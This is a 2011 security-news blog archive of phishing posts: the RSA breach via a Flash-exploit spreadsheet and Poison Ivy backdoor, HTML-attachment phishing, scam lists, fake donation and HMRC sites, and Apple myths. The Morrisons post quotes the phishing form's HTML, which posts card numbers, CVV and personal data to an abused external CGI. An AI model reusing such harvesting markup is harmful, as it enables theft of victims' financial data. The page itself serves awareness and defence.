Showing posts with label phishing. Show all posts
Showing posts with label phishing. Show all posts

Saturday, 3 September 2011

Researchers Uncover RSA Phishing Attack, Hiding in Plain Sight


Ever since security giant RSA was hacked last March, anti-virus researchers have been trying to get a copy of the malware used for the attack to study its method of infection. But RSA wasn’t cooperating, nor were the third-party forensic experts the company hired to investigate the breach.
This week Finnish security company F-Secure discovered that the file had been under their noses all along. Someone — the company assumes it was an employee of RSA or its parent firm, EMC — had uploaded the malware to an online virus scanning site back on March 19, a little over two weeks after RSA is believed to have been breached on March 3. The online scanner, VirusTotal, shares malware samples it receives with security vendors and malware researchers.
RSA had already revealed that it had been breached after attackers sent two different targeted phishing e-mails to four workers at its parent company EMC. The e-mails contained a malicious attachment that was identified in the subject line as “2011 Recruitment plan.xls.”
None of the recipients were people who would normally be considered high-profile or high-value targets, such as an executive or an IT administrator with special network privileges. But that didn’t matter. When one of the four recipients clicked on the attachment, the attachment used a zero-day exploit targeting a vulnerability in Adobe Flash to drop another malicious file — a backdoor — onto the recipient’s desktop computer. This gave the attackers a foothold to burrow farther into the network and gain the access they needed.
“The email was crafted well enough to trick one of the employees to retrieve it from their Junk mail folder, and open the attached excel file,” RSA wrote on its blog in April.
The intruders succeeded in stealing information related to the company’s SecurID two-factor authentication products. SecurID adds an extra layer of protection to a login process by requiring users to enter a secret code number displayed on a keyfob, or in software, in addition to their password. The number is cryptographically generated and changes every 30 seconds.
The company initially said that none of its customers were at risk, since the attackers would need more than the data they got from RSA to break into customer systems. But three months later, after defense contractor Lockheed Martin discovered hackers trying to breach their network using duplicates of the SecurID keys that RSA had issued the company — and other defense contractors such as L-3 were targeted in similar attacks — RSA announced it would replace most of its security tokens.
So just how well crafted was the e-mail that got RSA hacked? Not very, judging by what F-Secure found.
The attackers spoofed the e-mail to make it appear to come from a “web master” at Beyond.com, a job-seeking and recruiting site. Inside the e-mail, there was just one line of text: “I forward this file to you for review. Please open and view it.” This was apparently enough to get the intruders the keys to RSAs kingdom.
F-Secure produced a brief video showing what happened if the recipient clicked on the attachment. An Excel spreadsheet opened, which was completely blank except for an “X” that appeared in the first box of the spreadsheet. The “X” was the only visible sign that there was an embedded Flash exploit in the spreadsheet. When the spreadsheet opened, Excel triggered the Flash exploit to activate, which then dropped the backdoor – in this case a backdoor known as Poison Ivy – onto the system.
Poison Ivy would then reach out to a command-and-control server that the attackers controlled at good.mincesur.com, a domain that F-Secure says has been used in other espionage attacks, giving the attackers remote access to the infected computer at EMC. From there, they were able to reach the systems and data they were ultimately after.
F-Secure notes that neither the phishing e-mail nor the backdoor it dropped onto systems were advanced, although the zero-day Flash exploit it used to drop the backdoor was advanced. And ultimately, the fact that the attackers hacked a giant like RSA just to gain the information they needed to hack Lockheed Martin and other defense contractors exhibited a high level of advancement, not to mention chutzpah.

Friday, 1 April 2011

Under the phishing filters' radar

Phishing Criminals are reportedly using a new phishing technique that allows them to bypass the fraud warnings issued by modern browsers such as Firefox and Chrome. On its blog, security firm M86Security reports that the trick involves attaching an HTML document instead of sending a link. It remains unclear how many users have become victims so far.

Email recipients opening the HTML document in their browsers are, for example, presented with a bogus PayPal form with the usual request to enter their access data due to alleged security issues. As the form is being processed locally on the user's computer, the phishing filter doesn't issue a warning because it only filters external URLs. A click on the "Submit" button then transmits the entered data to a PHP script on a (hacked) server using a POST request. According to M86Security, the browser doesn't warn about this either.

While browsers should at least warn users when sending the data, M86Security stated two potential reasons why they won't: as users don't see the URL they access via POST requests, they can't report it, and consequently the URL is missing in the browser filter's blacklist. The company added that most users can't make anything of the HTML source code that is attached to the email.

Secondly, M86Security said that URLs which lead to a PHP script are very difficult to classify as phishing sites. It is reportedly hard to identify a phishing site without the accompanying HTML code which could, for instance, reveal whether a site pretends to be a banking site. This has apparently caused months-old phishing campaigns to remain undetected. The security firm didn't state whether its assessment only refers to the filter lists maintained for Chrome, Firefox and other browsers, or whether it also includes those of the AV vendors, who maintain separate lists for their own filter products.

[H-Online]

Sunday, 20 March 2011

Top Five Online Scams

#1 Nigerian Scams:


While these types of scams are generally understood to be Nigerian in nature and origin, and are in fact named after the 419 Nigerian code that made them illegal, advanced-fee scams happen right here in the good old USA by Americans presenting to offer jobs or may ask help to transfer money.


#2 Romance Scams:

If you ever hear talk like this, run far and fast: “In me sweetheart you are going to find the most passionate, loving and romantic man you have ever met. There are very few promises in life but this is one of them! ROMANCE is the key to my happiness and to my heart and soul!”


#3 Classified Ad Scams:

This story caught my eye: “An online scam targeting pet-lovers is circulating the web, and it could cost you more than a new pet. An ad posted to a local online classified website by a man who claimed he was living in Florida. He was willing to give the Labrador Retriever puppy named Dely away for the cost of shipping, which was $220.”


#4 Phishing:

Phishing continues to become more sophisticated, more effective, and more prevalent. In one example, criminal hackers waited until Pennsylvania school administrators were on vacation, then used simple money transfers to liquidate over $440,000 out of the districts accounts.


#5 Spear Phishing:

Spear phishing occurs when the scammers concentrate on a localized target, usually an individual with control over a company’s checkbook.

This insidious type of phishing occurs when a recipient clicks a link, either in the body of an email or on the spoofed website linked in the email, and a download begins.

Don’t be taken. Keep your head up and recognize when someone’s trying to take advantage of you.


Robert Siciliano personal and home security specialist to Home Security Source discussing home security and identity theft on TBS Movie and a Makeover.


[InfoSecIsland]

A Good Decade for Cyber Crime

Cybercrime is one of the most successful and lucrative industries of our time, growing by double digits year after year.

Over the last decade, cyber crooks have developed new and sophisticated ways to prey on an explosion of Internet users, with little danger of being caught.

Meanwhile, consumers face greater risks to their money and information each year.

A few famous exploits illustrate different eras of cybercrime:


“I Love You” worm’s false affection: $15 billion estimated damage
Emails with the subject line “I love you” proved irresistible in 2000. Millions of users downloaded the attached file, which was supposedly a love letter but was actually a virus. This infamous worm cost companies and government agencies $15 billion.


MyDoom’s mass infection: $38 billion estimated damage

This fast-moving worm, which first struck in 2004, tops McAfee’s list in terms of monetary damage. It delivered enough spam to slow global Internet access by 10% and reduce access to some websites by 50%, costing billions of dollars in lost productivity and online sales.


Conficker’s stealthy destruction: $9.1 billion estimated damage

This 2008 worm infected millions of computers. It went a step further than the other two worms on our list, downloading and installing a variety of malware that gave hackers remote control over victims’ PCs.
Some of the most common and nefarious scams include:


Fake antivirus software

Selling fake antivirus software is one of the most insidious and successful scams in recent years.
Cyber criminals play on users’ fears that their computers and information are at risk, displaying misleading pop-ups that prompt the victim to purchase antivirus software to fix the problem.
When victims enter their credit card information, it is stolen and, instead of security software, they wind up downloading malware.


Phishing scams

Phishing, or trying to trick users into giving up personal information, is one of the most common and persistent online threats. Phishing messages can come in the form of spam emails, spam instant messages, fake friend requests, or social networking posts.


Phony websites

In recent years, cyber crooks have become adept at creating fake websites that look like the real deal.
From phony online banking to auction sites and e-commerce pages, hackers lay traps in the hopes that you will be fooled into entering your credit card number or personal information.

For your own peace of mind, consider subscribing to an identity theft protection service such as McAfee Identity Protection, which offers proactive identity surveillance, lost wallet protection, alerts when suspicious activity is detected on your accounts, and access to fraud resolution agents. For additional tips, visit CounterIdentityTheft.com.


Robert Siciliano is a McAfee consultant and identity theft expert. See him explain how to protect yourself from identity theft on CounterIdentityTheft.com. (Disclosures)

[InfoSecIsland]

Morrisons supermarkets subject for phishing campaign

MX Lab, http://www.mxlab.eu, started to intercept phishing emails targettting the online activities of the Morrisons supermarkets.

The emails has the subject “New Morrisons Offer” and is sent from the spoofed email address “MORRISONS <noreply@morrisons.co.uk>” and has the folowing body contents:
This email is intended to inform you that there is a new offer at Morrisons Store.
This is a 2 weeks time offer. Register your card online and you will get 35% discount when using your card to pay in our stores.
In order to start the registration process please fill and submit the form attached to this email.
© Copyright Wm Morrison Supermarkets plc 2011. All rights reserved.
Attached to the email is the file Registration_Form.htm and once opened in a browser you will have the following screen:



The images and the web site style is taken from the official www.morrisons.co.uk web site but the form contents will be sent to hxxp://theburleyinn.co.uk/cgi-theburleyinn/form.cgi.

When examing the form coding you will notice that this is in fact a CGI (Common Gateway Interface) exploit, or abuse, as well.

<form style=”margin: 0px;” action=”hxxp://theburleyinn.co.uk/cgi-theburleyinn/form.cgi” method=”post”> <input name=”data_order” type=”hidden” value=”first_name,last_name,dob_d,dob_m,dob_y,mmn,address,city,state,zip,phone_number,
==================,document_type,document_no,issue_date,
==================,bank_name,name_on_card,card_number,exp_m,exp_y,cvv” />
<input name=”submit_to” type=”hidden” value=”adw.gray@gmail.com” />
<input name=”submit_by” type=”hidden” value=”abcdursulica@gmail.com” />
<input name=”form_id” type=”hidden” value=”Morrisons Fulls 3″ />
<input name=”ok_url” type=”hidden” value=”http://www.morrisons.co.uk/Offers/” />

These guys have figured out the values that the CGI needs in order to process the webform. It’s not too difficult either because at http://theburleyinn.co.uk/contact.html the CGI is called for a contact web form.

All the details are in the HTML page.

The major drawback on this CGI is that there is no control or check from where the CGI query will come from. It should be at least chech wether the CGI request is coming from the samen web site or local hosting server. If this is not the case it should reject the CGI request by default. It can be abused by anyone with some basic knowledge to send out for example a massive spam campaign.
Once the data is submitted on the phishing form, you will be redirected to the official site at http://www.morrisons.co.uk/Offers/.
Phishing attempts like this, where an HTML page is present as attachment instead of a embedded URL, are still being used. The main advandage is that it is more difficult to detect with technologies like Intent Analysis or SUBL that need an URL instead. But on the other hand, as a receiver of this kind of phishing emails, you should be more aware that these kind of emails are not to be trusted. No company in the world is sending you an attachment by email with the request to fill in your credit card details.


[Update March 14th, 2011 - 4:30 PM Local Belgian Time]

We have noticed new phishing emails coming from the spoofed email addresses:
offers@morrissons-discount.com

The attached HTML webform is requesting a CGI on a different server:

hxxp://www.janus-systems.com/cgi-bin/bnbform.cgi.

[ComputerSecurityArticles]

Monday, 14 March 2011

Phishing Attack Uses Fake Donation Website

Earlier today, we found a phishing site which poses as a donation site to raise money for victims of the recent earthquake in Japan. The phishing site, http://www.japan{BLOCKED}.com, is created by using an open-source social network system Jcow 4.2.1. It is hosted on the IP address 50.61.{BLOCKED}.{BLOCKED}, which has been found to be located to be in the US. We’ve confirmed that the site is still active as of this writing.
Click for larger view Click for larger view
Aside from hosting a phishing site, the cybercriminal behind this attack also abused the blog function of the website and inserted advertisement-looking posts, possibly to increase SEO ranking.
Click for larger view
Such attacks are not uncommon, as we’ve previously documented instances of attacks that leveraged on natural disasters such as Hurricane Katrina in 2005, Hurricane Gustav in 2008, Chinese Sichuan earthquake in 2008, the latest attack used Haiti earthquake in 2010.

Users should remember to choose trustworthy organizations when it comes to handing over their donations.

The Trend Micro Smart Protection Network, through the Web Reputation Service already blocks access to this phishing site even if a user is duped into accessing it.
Click for larger view


[TrendMicro]

Wednesday, 9 March 2011

Five Apple Security Myths — and the Disturbing Truths

"I just got a Mac,” think many first-time Apple customers. “I'll never have to worry about a virus again."
So it would seem to many longtime PC users, plagued by virus, e-mail and phishing attacks that require constant vigilance and the installation of often pricey security software. They rarely, if ever, hear their Mac-using friends complaining about the same problems.

But even though it’s true that Macintosh computers, iPhones, iPods and iPads (the latter three of which run Apple’s iOS mobile operating system) are subject to far fewer attacks than their Windows (or Android) counterparts, Apple products are definitely not immune to security flaws.

In fact, as Apple’s market shares increase, so do the chances of malware being written specifically for the company’s devices.

Virgin territory


Apple software is actually ripe for attack. At the 2010 “Pwn2Own” hacking contest, held every March at the CanSecWest security conference in Vancouver, Apple’s Mac OS X, the Safari Web browser and an iPhone 3GS were all exploited with surprising ease, falling quicker than their Windows-based competitors.

The overconfidence many Apple users feel about their gadgets may come from the company itself, said Alex Horan, director of product management at Boston-based Core Security.

“On its website, Apple states that: ‘Mac OS X doesn’t get PC viruses. And its built-in defenses help keep you safe from other malware without the hassle of constant alerts and sweeps,” Horan said.
But it’s a false comparison.

“Traditionally the only reason we haven’t seen a lot of news about viruses and worms targeting Mac systems is because we haven’t seen as many Mac systems in use,” Horan explained.

“The reality today remains that if I want to write some code that will attempt to control the maximum number of systems, then I need to have that code target the most common systems out there [Windows]. But as the number of Mac system grows, so will the attention of the attackers.”

Horan’s colleague at Core Security, Vice President of Security Awareness and Government Affairs Tom Kellermann, added a warning.

“Over the past few years, we’ve seen multiple exploits that have proven that this perception around Apple security is truly misguided,” Kellerman said. “Those people who believe that they are fundamentally more secure simply because they use Apple products will likely someday learn to regret it.”
Five hard lessons


With that in mind, here are five Apple security myths — and the brutal truth behind each:

Myth: I don't need antivirus and spam protection because I work on a Mac.

Truth: The Mac OS X operating system is targeted less frequently by malware only because it’s not as widespread as Windows. It’s no more secure than any other operating system, said Sorin Mustaca, data security expert at Germany-based Avira.

As for phishing attacks, said Mustaca, “the biggest problem in this case is not the computer itself, but rather it's the user.”

Myth: I can't be infected by any malicious software because I get my applications exclusively from the iTunes App Store.

Truth: “We've seen a couple of times already that the App Store is not such a secure fortress as one might have hoped,” said Mustaca. “It is extremely difficult to check every single application that is inserted there.”

Myth: Mac OS X is inherently more secure than Windows.

Truth: Apple’s brand-new products are being hacked almost immediately upon arrival. For example, “jailbreaking” your iPhone is as easy as browsing to a specific website.
“For a while, it was easier to write exploits for Mac OS X systems than it was for Windows, but now they're relatively equal,” said Core Security technical specialist Dan Crowley. “Bugs seem to be just as easy — if not easier — to find in Mac OS versus Windows.”

Myth: Apple's Safari browser is more secure than Microsoft's Internet Explorer.

Truth: Safari had more than twice the number of reported vulnerabilities in 2009 (94) than did Internet Explorer (41), according to Symantec's Global Internet Security Threat Report.

Myth: iPad users are not susceptible to the same sorts of attacks that Windows users experience.

Truth: According to Anup Ghosh, founder and chief scientist of Fairfax, Va.-based Invincea, Apple released the iOS 3.2.2 software update for the iPad specifically to fix a critical vulnerability in Adobe Reader that can be exploited by malicious PDF files.

So what can you do to make your Apple device more secure? First of all, never open an e-mail attachment you’re not expecting, even if it’s from someone you know.

Always check the URL — the long string of characters that begins with “http” — in your browser address window when surfing the Web, even on an iPhone or iPod Touch. Be very careful about using free Wi-Fi hotspots in coffeeshops, libraries or airports — it’s safer to just use your cellular carrier’s data service.

There isn’t any third-party security software for iOS devices as of yet, but a few Mac OS X applications are available, such as Sophos Anti-Virus for Mac Home Edition (free), BitDefender Antivirus 2011 for Mac (starting at $40 per year), Intego Virus Barrier X6 ($50 per year, two users) and various Norton products (starting at $50 per year).

[SecurityNewsDaily]

Sunday, 6 March 2011

Fake HMRC website offers bank refunds

A friend sent me this link, which is an interesting spin on the old “HMRC tax refund” scam – a fake HMRC claiming your bank wants to issue a refund instead.




Click to Enlarge

As you can see below, they have a large selection of banks to choose from (in keeping with more common phish attacks):




Click to Enlarge

Everybody from NatWest and HSBC to Santander and Halifax are in there. Most of the bank specific pages all ask for the same kind of personal information, but if one of the banks asks for something unique to them (such as a banking PIN or other security feature) the phishers have taken care to include those too. If your bank isn’t included, no problem: they have a generic “catch-all” page for you to sign up to years of identity theft and a couple of days worth of “Who bought all this stuff on iTunes”?

Here’s a sample of the information asked for on the Barclays page:




Click to Enlarge

Deep breath: name, address, phone number, email (and email password!), national insurance number, information related to your parents, how long you’ve lived at your address, employment status / income, your full card details (of course) and everything related to your online banking account.

I think “Ouch” is the word we’re looking for.

HMRC do not issue tax refunds by email, they most certainly do not have websites where banks want to issue you with refunds, and they also know how to spell “being” (take another look at that second screenshot).

Avoid like the plague.

[ComputerSecurityArticles]

Monday, 28 February 2011

Play.com customers at risk from phishing

Play.com, one of the biggest UK online retailers, has its share of scammers that try to lure users searching for a bargain and scam them out of their hard earned money.

Play - which is very much like Amazon and eBay and has the same option of rating sellers - is able to identify and push out scammy sellers only after they receive a bevy of lousy ratings for failing to deliver the goods.

But its not the £2 DVDs that earn the scammers enough money to make their efforts worth while. What usually happens is that the buyer receives an e-mail similar to this:



With "Problem with payment/order" in the subject line, the scammers try to trick users into sending them personal and credit card information that will allow them to steal more money from the buyers or sell that information to other crooks.

According to GFI, this particular letter tries to convince the user to fill out "the following secure form" by clicking on the reply button and filling in the black spaces. But what should immediately strike the potential victim as suspicious is the fact that there is no actual form to fill out, and that the sending of the details in plain text format cannot actually be secure if sent via e-mail.

Of course, some users are not aware of any of these things, and some might not be sure about their scam detection skills. That's why it is always a good idea to pick up the phone, find and directly dial the service's number (never the one offered in the e-mail) and ask them for advice.


[net-security]